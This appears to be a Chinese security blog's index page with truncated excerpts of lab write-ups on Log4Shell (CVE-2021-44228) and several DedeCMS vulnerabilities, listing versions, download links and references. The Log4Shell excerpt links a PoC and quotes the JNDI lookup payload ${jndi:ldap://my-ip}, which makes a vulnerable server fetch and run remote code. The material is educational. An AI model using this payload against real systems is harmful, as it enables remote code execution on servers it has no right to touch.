鸥鹭忘机

基本信息漏洞编号：CVE-2021-44228影响版本：2.x<=2.15.0-rc1poc地址：https://gitee.com/lcosmos/apache-log4j-poc在此十分感谢我的寝室长Cosmos提供的poc和技术支持。原理简述当log4j打印的日志内容中包含${jndi:ldap://my-ip}时，程序就会通过ldap协议访问my-ip这个地址，然后my-ip就会返回一个包含java代码的class文件的地址，然后程序再通过返回的地址下载class文件并执行。漏洞

基本信息漏洞编号：SSV-89354 CVE-ID：CVE-2015-4553 漏洞类别：变量覆盖 实验版本：dedecmsv5.7SP1(部分版本已修复) 利用条件：Apache，dedecms版本为v5.7SP且未修复，自备一台云主机云主机ip:192.168.18.131参考文章：http://blog.nsfocus.net/dedecms-write-file-vuln/https://seclists.org/fulldisclosure/2015/Jun/472015年6月17日

基本信息漏洞编号：SSV-97087 实验版本：dedecms v5.7SP2下载地址：http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz参考文章：https://www.seebug.org/vuldb/ssvid-97074前置知识如果要把一个key存储到cookie中，织梦的存储方式是把key和加密key同时存储在cookie中。每次读取用户传来的key时，将key进行加密后与传来的加密k

基本信息漏洞编号：SSV-97074实验版本：dedecms v5.3下载地址：http://www.dedecms.com/upimg/soft/2008/DedecmsV53-UTF8-Final.tar.gz参考文章：https://www.seebug.org/vuldb/ssvid-97074https://blog.youkuaiyun.com/qq_51569535/article/details/109211295https://blog.youkuaiyun.com/l1028386804/arti